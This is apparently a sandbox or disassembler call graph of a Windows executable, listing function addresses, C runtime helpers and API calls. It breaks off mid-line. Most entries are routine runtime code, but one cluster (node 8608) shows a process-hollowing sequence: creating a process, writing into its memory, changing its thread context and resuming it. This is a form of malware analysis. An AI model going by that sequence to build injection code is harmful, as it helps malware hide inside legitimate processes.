9715 dc7d69 __strnicoll 48 API calls 9712->9715 9716 dd0251 9713->9716 9714->9718 9715->9718 9719 dc7d69 __strnicoll 48 API calls 9716->9719 9717->9718 9718->9673 9719->9718 9721 dca8c8 __strnicoll 48 API calls 9720->9721 9722 dd02d5 9721->9722 9725 dd0308 9722->9725 9728 dd033c __strnicoll 9725->9728 9726 dc4241 CatchGuardHandler 5 API calls 9727 dcf98e 9726->9727 9727->9698 9727->9701 9729 dd05a0 9728->9729 9730 dd03bc 9728->9730 9732 dd03a9 GetCPInfo 9728->9732 9737 dd03c0 9728->9737 9731 dcbdee __strnicoll MultiByteToWideChar 9730->9731 9730->9737 9734 dd0442 9731->9734 9732->9730 9732->9737 9733 dd0594 9735 dcbccd __freea 14 API calls 9733->9735 9734->9733 9736 dcbc45 __strnicoll 15 API calls 9734->9736 9734->9737 9738 dd0469 __alloca_probe_16 9734->9738 9735->9737 9736->9738 9737->9726 9737->9729 9738->9733 9739 dcbdee __strnicoll MultiByteToWideChar 9738->9739 9740 dd04b5 9739->9740 9740->9733 9741 dcbdee __strnicoll MultiByteToWideChar 9740->9741 9742 dd04d1 9741->9742 9742->9733 9744 dd04df 9742->9744 9743 dd0542 9746 dcbccd __freea 14 API calls 9743->9746 9744->9743 9745 dcbc45 __strnicoll 15 API calls 9744->9745 9749 dd04f8 __alloca_probe_16 9744->9749 9745->9749 9747 dd0548 9746->9747 9748 dcbccd __freea 14 API calls 9747->9748 9748->9737 9749->9743 9750 dcbdee __strnicoll MultiByteToWideChar 9749->9750 9751 dd053b 9750->9751 9751->9743 9752 dd0564 9751->9752 9758 dc9ab5 9752->9758 9755 dcbccd __freea 14 API calls 9756 dd0584 9755->9756 9757 dcbccd __freea 14 API calls 9756->9757 9757->9737 9759 dc9f3d __strnicoll 5 API calls 9758->9759 9760 dc9ac0 9759->9760 9761 dc9cb9 __strnicoll 5 API calls 9760->9761 9763 dc9ac6 9760->9763 9762 dc9b06 CompareStringW 9761->9762 9762->9763 9763->9755 9765 dcf718 HeapSize 9764->9765 9766 dcf703 9764->9766 9765->9629 9767 dcb757 __strnicoll 14 API calls 9766->9767 9768 dcf708 9767->9768 9769 dc7d69 __strnicoll 48 API calls 9768->9769 9770 dcf713 9769->9770 9770->9629 9772 dcf738 9771->9772 9773 dcf743 9771->9773 9774 dcbc45 __strnicoll 15 API calls 9772->9774 9775 dcf74b 9773->9775 9781 dcf754 __dosmaperr 9773->9781 9779 dcf740 9774->9779 9776 dcb0cb __freea 14 API calls 9775->9776 9776->9779 9777 dcf77e HeapReAlloc 9777->9779 9777->9781 9778 dcf759 9780 dcb757 __strnicoll 14 API calls 9778->9780 9779->9633 9780->9779 9781->9777 9781->9778 9782 dc7207 __dosmaperr 2 API calls 9781->9782 9782->9781 9784 dca8c8 __strnicoll 48 API calls 9783->9784 9785 dcc286 9784->9785 9786 dcc298 9785->9786 9791 dc9a96 9785->9791 9788 dcc30c 9786->9788 9797 dcc4e2 9788->9797 9794 dc9f23 9791->9794 9795 dc9e9e __dosmaperr 5 API calls 9794->9795 9796 dc9a9e 9795->9796 9796->9786 9798 dcc50a 9797->9798 9799 dcc4f0 9797->9799 9801 dcc530 9798->9801 9802 dcc511 9798->9802 9815 dcc2f2 9799->9815 9804 dcbdee __strnicoll MultiByteToWideChar 9801->9804 9803 dcc324 9802->9803 9819 dcc2b3 9802->9819 9803->9639 9803->9641 9806 dcc53f 9804->9806 9807 dcc546 GetLastError 9806->9807 9810 dcc2b3 15 API calls 9806->9810 9813 dcc56c 9806->9813 9824 dcb77d 9807->9824 9810->9813 9811 dcbdee __strnicoll MultiByteToWideChar 9814 dcc583 9811->9814 9812 dcb757 __strnicoll 14 API calls 9812->9803 9813->9803 9813->9811 9814->9803 9814->9807 9816 dcc2fd 9815->9816 9817 dcc305 9815->9817 9818 dcb0cb __freea 14 API calls 9816->9818 9817->9803 9818->9817 9820 dcc2f2 14 API calls 9819->9820 9821 dcc2c1 9820->9821 9829 dcc255 9821->9829 9832 dcb76a 9824->9832 9826 dcb788 __dosmaperr 9827 dcb757 __strnicoll 14 API calls 9826->9827 9828 dcb79b 9827->9828 9828->9812 9830 dcbc45 __strnicoll 15 API calls 9829->9830 9831 dcc262 9830->9831 9831->9803 9833 dca15b __dosmaperr 14 API calls 9832->9833 9834 dcb76f 9833->9834 9834->9826 9836 dbce50 std::_Throw_Cpp_error 9835->9836 9854 dc3b60 9836->9854 9839 dbce70 9847 dbce93 9839->9847 9840 dc441d 52 API calls std::_Throw_Cpp_error 9840->9847 9841 dbd449 9842 dc4241 CatchGuardHandler 5 API calls 9841->9842 9843 dbcdd5 CreateEllipticRgn 9842->9843 9848 dbd4a0 9843->9848 9844 dbcf87 GetCurrentThreadId 9844->9847 9845 dc441d std::_Throw_Cpp_error 52 API calls 9845->9844 9847->9840 9847->9841 9847->9844 9847->9845 10211 dc4952 WaitForSingleObjectEx 9847->10211 9850 dbd4c0 9848->9850 9851 dbd528 9850->9851 10216 dc846b 9850->10216 9852 dc4241 CatchGuardHandler 5 API calls 9851->9852 9853 dbce14 9852->9853 9853->8981 9855 dc3b8b std::_Throw_Cpp_error 9854->9855 9868 dc3cc0 9855->9868 9857 dc3b9a 9877 dc6ce6 9857->9877 9859 dc3c84 9896 dc441d 9859->9896 9861 dc3c9a 9902 dc3e30 9861->9902 9862 dc3bea 9862->9859 9862->9861 9892 dc3de0 9862->9892 9865 dc4241 CatchGuardHandler 5 API calls 9867 dbcdc7 9865->9867 9867->9839 9908 dc41c6 9868->9908 9870 dc3cef std::_Throw_Cpp_error 9922 dc3f00 9870->9922 9875 dc4241 CatchGuardHandler 5 API calls 9876 dc3d32 9875->9876 9876->9857 9878 dc6d07 9877->9878 9879 dc6cf3 9877->9879 9946 dc6d77 9878->9946 9881 dcb757 __strnicoll 14 API calls 9879->9881 9883 dc6cf8 9881->9883 9885 dc7d69 __strnicoll 48 API calls 9883->9885 9884 dc6d1c CreateThread 9887 dc6d3b GetLastError 9884->9887 9888 dc6d47 9884->9888 9963 dc6e00 9884->9963 9886 dc6d03 9885->9886 9886->9862 9889 dcb77d __dosmaperr 14 API calls 9887->9889 9955 dc6dc7 9888->9955 9889->9888 9893 dc3e0c 9892->9893 9894 dc4241 CatchGuardHandler 5 API calls 9893->9894 9895 dc3e19 9894->9895 9895->9862 9897 dc4433 std::_Throw_Cpp_error 9896->9897 10103 dc467d 9897->10103 9903 dc3e58 std::_Throw_Cpp_error 9902->9903 9904 dc3ee3 9903->9904 10207 dc40f0 9903->10207 9905 dc4241 CatchGuardHandler 5 API calls 9904->9905 9906 dc3ca2 9905->9906 9906->9865 9910 dc41cb 9908->9910 9911 dc41e5 9910->9911 9912 dc7207 __dosmaperr 2 API calls 9910->9912 9914 dc41e7 std::_Throw_Cpp_error 9910->9914 9931 dc83c7 9910->9931 9911->9870 9912->9910 9913 dc49c1 std::_Throw_Cpp_error 9915 dc59fc CallUnexpected RaiseException 9913->9915 9914->9913 9938 dc59fc 9914->9938 9917 dc49de IsProcessorFeaturePresent 9915->9917 9919 dc49f4 9917->9919 9941 dc4ad9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9919->9941 9921 dc4ad7 9921->9870 9942 dc3fb0 9922->9942 9925 dc4241 CatchGuardHandler 5 API calls 9926 dc3d0e 9925->9926 9927 dc3f60 9926->9927 9928 dc3f95 9927->9928 9929 dc4241 CatchGuardHandler 5 API calls 9928->9929 9930 dc3d22 9929->9930 9930->9875 9937 dcbc45 __dosmaperr 9931->9937 9932 dcbc83 9933 dcb757 __strnicoll 14 API calls 9932->9933 9935 dcbc81 9933->9935 9934 dcbc6e RtlAllocateHeap 9934->9935 9934->9937 9935->9910 9936 dc7207 __dosmaperr 2 API calls 9936->9937 9937->9932 9937->9934 9937->9936 9939 dc5a16 9938->9939 9940 dc5a43 RaiseException 9938->9940 9939->9940 9940->9913 9941->9921 9943 dc3fe2 std::_Throw_Cpp_error 9942->9943 9944 dc4241 CatchGuardHandler 5 API calls 9943->9944 9945 dc3f36 9944->9945 9945->9925 9947 dcb807 __dosmaperr 14 API calls 9946->9947 9948 dc6d88 9947->9948 9949 dcb0cb __freea 14 API calls 9948->9949 9950 dc6d95 9949->9950 9951 dc6d9c GetModuleHandleExW 9950->9951 9952 dc6db9 9950->9952 9951->9952 9953 dc6dc7 16 API calls 9952->9953 9954 dc6d13 9953->9954 9954->9884 9954->9888 9956 dc6dd3 9955->9956 9962 dc6d52 9955->9962 9957 dc6dd9 CloseHandle 9956->9957 9958 dc6de2 9956->9958 9957->9958 9959 dc6de8 FreeLibrary 9958->9959 9960 dc6df1 9958->9960 9959->9960 9961 dcb0cb __freea 14 API calls 9960->9961 9961->9962 9962->9862 9964 dc6e0c __FrameHandler3::FrameUnwindToState 9963->9964 9965 dc6e20 9964->9965 9966 dc6e13 GetLastError ExitThread 9964->9966 9967 dca00a _unexpected 48 API calls 9965->9967 9968 dc6e25 9967->9968 9979 dcb976 9968->9979 9971 dc6e3c 9983 dc3d40 9971->9983 9980 dc6e30 9979->9980 9981 dcb986 CallUnexpected 9979->9981 9980->9971 9994 dc9cea 9980->9994 9981->9980 10000 dc9d93 9981->10000 9984 dc3f60 5 API calls 9983->9984 9985 dc3d6d std::_Throw_Cpp_error 9984->9985 10003 dc40a0 9985->10003 9990 dc3e30 5 API calls 9991 dc3da6 9990->9991 9992 dc4241 CatchGuardHandler 5 API calls 9991->9992 9993 dc3db5 9992->9993 9997 dc6d69 9993->9997 9995 dc9e9e __dosmaperr 5 API calls 9994->9995 9996 dc9d06 9995->9996 9996->9971 10091 dc6e7e 9997->10091 10001 dc9e9e __dosmaperr 5 API calls 10000->10001 10002 dc9daf 10001->10002 10002->9980 10011 dbcd10 GetPEB 10003->10011 10006 dc48cb GetCurrentThreadId 10083 dc4c86 10006->10083 10010 dc48e4 __Mtx_unlock __Cnd_broadcast 10086 dc4c92 10010->10086 10018 dc84a7 10011->10018 10016 dc4241 CatchGuardHandler 5 API calls 10017 dbcd82 10016->10017 10017->10006 10019 dc84ba __strnicoll 10018->10019 10033 dc8537 10019->10033 10022 dc7fd7 __strnicoll 48 API calls 10023 dbcd62 10022->10023 10024 dbc860 10023->10024 10027 dbc890 10024->10027 10026 dbcced 10028 dc4241 CatchGuardHandler 5 API calls 10026->10028 10027->10026 10057 dbbeb0 CreateFileA 10027->10057 10067 db86c0 10027->10067 10074 db1000 10027->10074 10080 db8ea0 10027->10080 10030 dbccf9 10028->10030 10030->10016 10034 dc8567 10033->10034 10035 dc8594 10034->10035 10036 dc8576 10034->10036 10047 dc856b 10034->10047 10038 dc85a1 10035->10038 10040 dc84de ___scrt_uninitialize_crt 48 API calls 10035->10040 10037 dc7f12 __strnicoll 29 API calls 10036->10037 10037->10047 10041 dc85d9 10038->10041 10042 dc85bb 10038->10042 10039 dc4241 CatchGuardHandler 5 API calls 10045 dc84cc 10039->10045 10040->10038 10043 dc85ed 10041->10043 10044 dc8769 10041->10044 10046 dcda19 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10042->10046 10043->10047 10049 dc8687 10043->10049 10053 dc8631 10043->10053 10044->10047 10048 dcd131 ___scrt_uninitialize_crt WideCharToMultiByte 10044->10048 10045->10022 10046->10047 10047->10039 10048->10047 10050 dcd131 ___scrt_uninitialize_crt WideCharToMultiByte 10049->10050 10052 dc869a 10050->10052 10051 dcd131 ___scrt_uninitialize_crt WideCharToMultiByte 10051->10047 10052->10047 10054 dc86b3 GetLastError 10052->10054 10053->10051 10054->10047 10055 dc86c2 10054->10055 10055->10047 10056 dcd131 ___scrt_uninitialize_crt WideCharToMultiByte 10055->10056 10056->10055 10062 dbbf29 10057->10062 10058 dbc021 GetFileSize 10058->10062 10059 dbc083 ReadFile 10059->10062 10060 dbc12c CloseHandle 10060->10062 10061 dbc059 CloseHandle 10061->10062 10062->10058 10062->10059 10062->10060 10062->10061 10063 dbc14b 10062->10063 10065 dbc10d CloseHandle 10062->10065 10064 dc4241 CatchGuardHandler 5 API calls 10063->10064 10066 dbc160 10064->10066 10065->10062 10066->10027 10073 db8783 std::_Throw_Cpp_error 10067->10073 10068 db8dd8 10069 dc4241 CatchGuardHandler 5 API calls 10068->10069 10071 db8de8 10069->10071 10070 dbea10 51 API calls std::_Throw_Cpp_error 10070->10073 10071->10027 10072 dbe9b0 5 API calls std::_Throw_Cpp_error 10072->10073 10073->10068 10073->10070 10073->10072 10075 db1041 10074->10075 10076 db7eb0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10075->10076 10077 db1451 10076->10077 10078 dc4241 CatchGuardHandler 5 API calls 10077->10078 10079 db7e16 10078->10079 10079->10027 10081 dbd560 std::_Throw_Cpp_error 48 API calls 10080->10081 10082 db8eb6 10081->10082 10082->10027 10089 dc51de EnterCriticalSection 10083->10089 10085 dc4c90 10085->10010 10090 dc51ec LeaveCriticalSection 10086->10090 10088 dc3d9e 10088->9990 10089->10085 10090->10088 10092 dca15b __dosmaperr 14 API calls 10091->10092 10094 dc6e89 10092->10094 10093 dc6ecb ExitThread 10094->10093 10095 dc6ea2 10094->10095 10100 dc9d25 10094->10100 10097 dc6eb5 10095->10097 10098 dc6eae CloseHandle 10095->10098 10097->10093 10099 dc6ec1 FreeLibraryAndExitThread 10097->10099 10098->10097 10099->10093 10101 dc9e9e __dosmaperr 5 API calls 10100->10101 10102 dc9d3e 10101->10102 10102->10095 10104 dc4689 __EH_prolog3_GS 10103->10104 10105 db86c0 std::_Throw_Cpp_error 51 API calls 10104->10105 10106 dc469d 10105->10106 10113 dc45a6 10106->10113 10131 dc42e6 10113->10131 10115 dc45d7 10135 dc4533 10115->10135 10118 dbd560 std::_Throw_Cpp_error 48 API calls 10119 dc45f9 10118->10119 10120 dc4241 CatchGuardHandler 5 API calls 10119->10120 10121 dc4618 10120->10121 10122 dbd560 10121->10122 10126 dbd584 std::_Throw_Cpp_error 10122->10126 10123 dbd6bf std::_Throw_Cpp_error 10124 dc4241 CatchGuardHandler 5 API calls 10123->10124 10125 dbd6f5 10124->10125 10128 dc4bd9 10125->10128 10126->10123 10204 dbd780 10126->10204 10129 dc4241 CatchGuardHandler 5 API calls 10128->10129 10130 dc4be3 10129->10130 10130->10130 10132 dc42fe 10131->10132 10134 dc4305 CatchIt 10132->10134 10147 dbf980 10132->10147 10134->10115 10136 dc453f __EH_prolog3_GS 10135->10136 10138 dc455e std::_Throw_Cpp_error 10136->10138 10174 dc434e 10136->10174 10139 dc434e std::_Throw_Cpp_error 51 API calls 10138->10139 10140 dc4583 10139->10140 10141 dbd560 std::_Throw_Cpp_error 48 API calls 10140->10141 10142 dc458b std::_Throw_Cpp_error 10141->10142 10143 dbd560 std::_Throw_Cpp_error 48 API calls 10142->10143 10144 dc459e 10143->10144 10145 dc4bd9 std::_Throw_Cpp_error 5 API calls 10144->10145 10146 dc45a5 std::domain_error::domain_error 10145->10146 10146->10118 10152 dbf9a4 10147->10152 10149 dbfeac 10150 dc4241 CatchGuardHandler 5 API calls 10149->10150 10151 dbfebc 10150->10151 10151->10134 10152->10149 10154 dbff00 10152->10154 10162 dc0ff0 10152->10162 10155 dbffa3 10154->10155 10156 dc0ff0 21 API calls std::_Throw_Cpp_error 10155->10156 10157 dc0642 10155->10157 10165 dc1010 10155->10165 10169 dc7d79 10155->10169 10156->10155 10158 dc4241 CatchGuardHandler 5 API calls 10157->10158 10159 dc0fc0 10158->10159 10159->10152 10163 dc41c6 std::_Throw_Cpp_error 21 API calls 10162->10163 10164 dc1007 10163->10164 10164->10152 10166 dc101e std::_Throw_Cpp_error 10165->10166 10167 dc59fc CallUnexpected RaiseException 10166->10167 10168 dc1036 10167->10168 10170 dc809f __strnicoll 48 API calls 10169->10170 10171 dc7d88 10170->10171 10172 dc7d96 __strnicoll 11 API calls 10171->10172 10173 dc7d95 10172->10173 10175 dc438f 10174->10175 10177 dc4365 CatchIt 10174->10177 10178 dc476d 10175->10178 10177->10138 10179 dc4828 10178->10179 10180 dc4792 10178->10180 10201 dbf170 10179->10201 10189 dbf4d0 10180->10189 10185 dbf980 std::_Throw_Cpp_error 51 API calls 10186 dc47ae CatchIt 10185->10186 10188 dc47fa CatchIt 10186->10188 10195 dbd7f0 10186->10195 10188->10177 10190 dbf718 10189->10190 10191 dbf2e0 std::_Throw_Cpp_error 5 API calls 10190->10191 10192 dbf94d 10190->10192 10191->10190 10193 dc4241 CatchGuardHandler 5 API calls 10192->10193 10194 dbf960 10193->10194 10194->10185 10200 dbd8d2 10195->10200 10196 dbe5ad std::_Throw_Cpp_error 10197 dc4241 CatchGuardHandler 5 API calls 10196->10197 10198 dbe5d5 10197->10198 10198->10188 10199 dbe600 std::_Throw_Cpp_error 48 API calls 10199->10200 10200->10196 10200->10199 10202 dc4846 std::_Xinvalid_argument 50 API calls 10201->10202 10203 dbf182 10202->10203 10205 dbd7f0 std::_Throw_Cpp_error 48 API calls 10204->10205 10206 dbd7ab 10205->10206 10206->10126 10208 dc4114 10207->10208 10209 dc4241 CatchGuardHandler 5 API calls 10208->10209 10210 dc4196 10209->10210 10210->9903 10212 dc4968 GetExitCodeThread 10211->10212 10213 dc499a 10211->10213 10212->10213 10214 dc4979 CloseHandle 10212->10214 10213->9847 10214->9847 10217 dc8477 __FrameHandler3::FrameUnwindToState 10216->10217 10218 dca00a _unexpected 48 API calls 10217->10218 10221 dc847c 10218->10221 10219 dc835d CallUnexpected 48 API calls 10220 dc84a6 10219->10220 10221->10219 10223 dc6a7d 10222->10223 10224 dc6a8f ___scrt_uninitialize_crt 10222->10224 10225 dc6a8b 10223->10225 10227 dcb4a7 10223->10227 10224->8996 10225->8996 10230 dcb5d2 10227->10230 10233 dcb6ab 10230->10233 10234 dcb6b7 __FrameHandler3::FrameUnwindToState 10233->10234 10241 dc8161 EnterCriticalSection 10234->10241 10236 dcb72d 10250 dcb74b 10236->10250 10238 dcb6c1 ___scrt_uninitialize_crt 10238->10236 10242 dcb61f 10238->10242 10241->10238 10243 dcb62b __FrameHandler3::FrameUnwindToState 10242->10243 10253 dc6aef EnterCriticalSection 10243->10253 10245 dcb635 ___scrt_uninitialize_crt 10246 dcb66e 10245->10246 10254 dcb4b0 10245->10254 10267 dcb69f 10246->10267 10366 dc8178 LeaveCriticalSection 10250->10366 10252 dcb4ae 10252->10225 10253->10245 10255 dcb4c5 __strnicoll 10254->10255 10256 dcb4cc 10255->10256 10257 dcb4d7 10255->10257 10258 dcb5d2 ___scrt_uninitialize_crt 77 API calls 10256->10258 10270 dcb515 10257->10270 10260 dcb4d2 10258->10260 10262 dc7fd7 __strnicoll 48 API calls 10260->10262 10264 dcb50f 10262->10264 10264->10246 10265 dcb4f8 10283 dce11f 10265->10283 10365 dc6b03 LeaveCriticalSection 10267->10365 10269 dcb68d 10269->10238 10271 dcb52e 10270->10271 10275 dcb4e1 10270->10275 10272 dcd936 ___scrt_uninitialize_crt 48 API calls 10271->10272 10271->10275 10273 dcb54a 10272->10273 10294 dce45a 10273->10294 10275->10260 10276 dcd936 10275->10276 10277 dcd957 10276->10277 10278 dcd942 10276->10278 10277->10265 10279 dcb757 __strnicoll 14 API calls 10278->10279 10280 dcd947 10279->10280 10281 dc7d69 __strnicoll 48 API calls 10280->10281 10282 dcd952 10281->10282 10282->10265 10284 dce13d 10283->10284 10285 dce130 10283->10285 10287 dce186 10284->10287 10289 dce164 10284->10289 10286 dcb757 __strnicoll 14 API calls 10285->10286 10293 dce135 10286->10293 10288 dcb757 __strnicoll 14 API calls 10287->10288 10290 dce18b 10288->10290 10335 dce19c 10289->10335 10292 dc7d69 __strnicoll 48 API calls 10290->10292 10292->10293 10293->10260 10296 dce466 __FrameHandler3::FrameUnwindToState 10294->10296 10295 dce46e 10295->10275 10296->10295 10297 dce4a7 10296->10297 10299 dce4ed 10296->10299 10298 dc7f12 __strnicoll 29 API calls 10297->10298 10298->10295 10305 dcd8d7 EnterCriticalSection 10299->10305 10301 dce4f3 10302 dce511 10301->10302 10306 dce23e 10301->10306 10332 dce563 10302->10332 10305->10301 10307 dce266 10306->10307 10329 dce289 ___scrt_uninitialize_crt 10306->10329 10308 dce26a 10307->10308 10310 dce2c5 10307->10310 10309 dc7f12 __strnicoll 29 API calls 10308->10309 10309->10329 10311 dce2e3 10310->10311 10313 dcfa51 ___scrt_uninitialize_crt 50 API calls 10310->10313 10312 dce56b ___scrt_uninitialize_crt 49 API calls 10311->10312 10314 dce2f5 10312->10314 10313->10311 10315 dce2fb 10314->10315 10316 dce342 10314->10316 10317 dce32a 10315->10317 10318 dce303 10315->10318 10319 dce3ab WriteFile 10316->10319 10320 dce356 10316->10320 10321 dce5e8 ___scrt_uninitialize_crt 54 API calls 10317->10321 10327 dce9af ___scrt_uninitialize_crt 6 API calls 10318->10327 10318->10329 10322 dce3cd GetLastError 10319->10322 10319->10329 10323 dce35e 10320->10323 10324 dce397 10320->10324 10321->10329 10322->10329 10325 dce383 10323->10325 10326 dce363 10323->10326 10328 dcea17 ___scrt_uninitialize_crt 7 API calls 10324->10328 10330 dcebdb ___scrt_uninitialize_crt 8 API calls 10325->10330 10326->10329 10331 dceaf2 ___scrt_uninitialize_crt 7 API calls 10326->10331 10327->10329 10328->10329 10329->10302 10330->10329 10331->10329 10333 dcd8fa ___scrt_uninitialize_crt LeaveCriticalSection 10332->10333 10334 dce569 10333->10334 10334->10295 10336 dce1a8 __FrameHandler3::FrameUnwindToState 10335->10336 10348 dcd8d7 EnterCriticalSection 10336->10348 10338 dce1b7 10339 dce1fc 10338->10339 10349 dcd68e 10338->10349 10341 dcb757 __strnicoll 14 API calls 10339->10341 10343 dce203 10341->10343 10342 dce1e3 FlushFileBuffers 10342->10343 10344 dce1ef GetLastError 10342->10344 10362 dce232 10343->10362 10345 dcb76a __dosmaperr 14 API calls 10344->10345 10345->10339 10348->10338 10350 dcd69b 10349->10350 10351 dcd6b0 10349->10351 10352 dcb76a __dosmaperr 14 API calls 10350->10352 10354 dcb76a __dosmaperr 14 API calls 10351->10354 10357 dcd6d5 10351->10357 10353 dcd6a0 10352->10353 10356 dcb757 __strnicoll 14 API calls 10353->10356 10355 dcd6e0 10354->10355 10358 dcb757 __strnicoll 14 API calls 10355->10358 10359 dcd6a8 10356->10359 10357->10342 10360 dcd6e8 10358->10360 10359->10342 10361 dc7d69 __strnicoll 48 API calls 10360->10361 10361->10359 10363 dcd8fa ___scrt_uninitialize_crt LeaveCriticalSection 10362->10363 10364 dce21b 10363->10364 10364->10293 10365->10269 10366->10252 11599 dc7310 11602 dc7337 11599->11602 11603 dc7343 __FrameHandler3::FrameUnwindToState 11602->11603 11610 dc8161 EnterCriticalSection 11603->11610 11605 dc737b 11611 dc7399 11605->11611 11606 dc734d 11606->11605 11608 dcc1fa __strnicoll 14 API calls 11606->11608 11608->11606 11610->11606 11614 dc8178 LeaveCriticalSection 11611->11614 11613 dc7335 11614->11613 8608 ddb18d 8609 ddb1c3 8608->8609 8610 ddb310 GetPEB 8609->8610 8611 ddb322 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 8609->8611 8610->8611 8611->8609 8612 ddb3c9 WriteProcessMemory 8611->8612 8613 ddb40e 8612->8613 8614 ddb450 WriteProcessMemory Wow64SetThreadContext ResumeThread 8613->8614 8615 ddb413 WriteProcessMemory 8613->8615 8615->8613 10946 dc41b0 10951 dc4c32 10946->10951 10952 dc41ba 10951->10952 10953 dc4c42 10951->10953 10955 dc4f6a 10952->10955 10953->10952 10958 dc51bb InitializeCriticalSectionEx 10953->10958 10959 dc4f7f 10955->10959 10958->10953 10960 dc4f8e 10959->10960 10961 dc4f95 10959->10961 10965 dc77a9 10960->10965 10968 dc7738 10961->10968 10964 dc41c4 10966 dc7738 51 API calls 10965->10966 10967 dc77bb 10966->10967 10967->10964 10971 dc799b 10968->10971 10972 dc79a7 __FrameHandler3::FrameUnwindToState 10971->10972 10979 dc8161 EnterCriticalSection 10972->10979 10974 dc79b5 10980 dc77bf 10974->10980 10976 dc79c2 10990 dc79ea 10976->10990 10979->10974 10981 dc77da 10980->10981 10989 dc784d __dosmaperr 10980->10989 10982 dc782d 10981->10982 10984 dcd0c4 51 API calls 10981->10984 10981->10989 10983 dcd0c4 51 API calls 10982->10983 10982->10989 10985 dc7843 10983->10985 10986 dc7823 10984->10986 10987 dcb0cb __freea 14 API calls 10985->10987 10988 dcb0cb __freea 14 API calls 10986->10988 10987->10989 10988->10982 10989->10976 10993 dc8178 LeaveCriticalSection 10990->10993 10992 dc7769 10992->10964 10993->10992 10994 dca2b0 10995 dca2cb 10994->10995 10996 dca2bb 10994->10996 11000 dca3b5 10996->11000 10999 dcb0cb __freea 14 API calls 10999->10995 11001 dca3ca 11000->11001 11002 dca3d0 11000->11002 11003 dcb0cb __freea 14 API calls 11001->11003 11004 dcb0cb __freea 14 API calls 11002->11004 11003->11002 11005 dca3dc 11004->11005 11006 dcb0cb __freea 14 API calls 11005->11006 11007 dca3e7 11006->11007 11008 dcb0cb __freea 14 API calls 11007->11008 11009 dca3f2 11008->11009 11010 dcb0cb __freea 14 API calls 11009->11010 11011 dca3fd 11010->11011 11012 dcb0cb __freea 14 API calls 11011->11012 11013 dca408 11012->11013 11014 dcb0cb __freea 14 API calls 11013->11014 11015 dca413 11014->11015 11016 dcb0cb __freea 14 API calls 11015->11016 11017 dca41e 11016->11017 11018 dcb0cb __freea 14 API calls 11017->11018 11019 dca429 11018->11019 11020 dcb0cb __freea 14 API calls 11019->11020 11021 dca437 11020->11021 11026 dca52e 11021->11026 11027 dca53a __FrameHandler3::FrameUnwindToState 11026->11027 11042 dc8161 EnterCriticalSection 11027->11042 11031 dca544 11032 dcb0cb __freea 14 API calls 11031->11032 11033 dca56e 11031->11033 11032->11033 11043 dca58d 11033->11043 11034 dca599 11035 dca5a5 __FrameHandler3::FrameUnwindToState 11034->11035 11047 dc8161 EnterCriticalSection 11035->11047 11037 dca5af 11038 dca2d1 __dosmaperr 14 API calls 11037->11038 11039 dca5c2 11038->11039 11048 dca5e2 11039->11048 11042->11031 11046 dc8178 LeaveCriticalSection 11043->11046 11045 dca45d 11045->11034 11046->11045 11047->11037 11051 dc8178 LeaveCriticalSection 11048->11051 11050 dca2c3 11050->10999 11051->11050 8616 dc83ac 8619 dcb0cb 8616->8619 8620 dcb0d6 RtlFreeHeap 8619->8620 8621 dc83c4 8619->8621 8620->8621 8622 dcb0eb GetLastError 8620->8622 8623 dcb0f8 __dosmaperr 8622->8623 8625 dcb757 8623->8625 8628 dca15b GetLastError 8625->8628 8627 dcb75c 8627->8621 8629 dca177 8628->8629 8630 dca171 8628->8630 8634 dca17b SetLastError 8629->8634 8656 dc9bcf 8629->8656 8651 dc9b90 8630->8651 8634->8627 8638 dca1b0 8640 dc9bcf __dosmaperr 6 API calls 8638->8640 8639 dca1c1 8641 dc9bcf __dosmaperr 6 API calls 8639->8641 8648 dca1be 8640->8648 8642 dca1cd 8641->8642 8643 dca1e8 8642->8643 8644 dca1d1 8642->8644 8668 dca31c 8643->8668 8647 dc9bcf __dosmaperr 6 API calls 8644->8647 8645 dcb0cb __freea 12 API calls 8645->8634 8647->8648 8648->8645 8650 dcb0cb __freea 12 API calls 8650->8634 8673 dc9e9e 8651->8673 8654 dc9bb5 8654->8629 8655 dc9bc7 TlsGetValue 8657 dc9e9e __dosmaperr 5 API calls 8656->8657 8658 dc9beb 8657->8658 8659 dc9c09 TlsSetValue 8658->8659 8660 dc9bf4 8658->8660 8660->8634 8661 dcb807 8660->8661 8662 dcb814 __dosmaperr 8661->8662 8663 dcb854 8662->8663 8664 dcb83f RtlAllocateHeap 8662->8664 8688 dc7207 8662->8688 8666 dcb757 __strnicoll 13 API calls 8663->8666 8664->8662 8665 dca1a8 8664->8665 8665->8638 8665->8639 8666->8665 8702 dca482 8668->8702 8674 dc9ece 8673->8674 8678 dc9bac 8673->8678 8674->8678 8680 dc9dd3 8674->8680 8677 dc9ee8 GetProcAddress 8677->8678 8679 dc9ef8 __dosmaperr 8677->8679 8678->8654 8678->8655 8679->8678 8686 dc9de4 ___vcrt_FlsFree 8680->8686 8681 dc9e7a 8681->8677 8681->8678 8682 dc9e02 LoadLibraryExW 8683 dc9e1d GetLastError 8682->8683 8684 dc9e81 8682->8684 8683->8686 8684->8681 8685 dc9e93 FreeLibrary 8684->8685 8685->8681 8686->8681 8686->8682 8687 dc9e50 LoadLibraryExW 8686->8687 8687->8684 8687->8686 8691 dc7242 8688->8691 8692 dc724e __FrameHandler3::FrameUnwindToState 8691->8692 8697 dc8161 EnterCriticalSection 8692->8697 8694 dc7259 CallUnexpected 8698 dc7290 8694->8698 8697->8694 8701 dc8178 LeaveCriticalSection 8698->8701 8700 dc7212 8700->8662 8701->8700 8703 dca48e __FrameHandler3::FrameUnwindToState 8702->8703 8716 dc8161 EnterCriticalSection 8703->8716 8705 dca498 8717 dca4c8 8705->8717 8708 dca4d4 8709 dca4e0 __FrameHandler3::FrameUnwindToState 8708->8709 8721 dc8161 EnterCriticalSection 8709->8721 8711 dca4ea 8722 dca2d1 8711->8722 8713 dca502 8726 dca522 8713->8726 8716->8705 8720 dc8178 LeaveCriticalSection 8717->8720 8719 dca38a 8719->8708 8720->8719 8721->8711 8723 dca307 __dosmaperr 8722->8723 8724 dca2e0 __dosmaperr 8722->8724 8723->8713 8724->8723 8729 dcbfae 8724->8729 8843 dc8178 LeaveCriticalSection 8726->8843 8728 dca1f3 8728->8650 8730 dcbfc4 8729->8730 8751 dcc02e 8729->8751 8733 dcbff7 8730->8733 8738 dcb0cb __freea 14 API calls 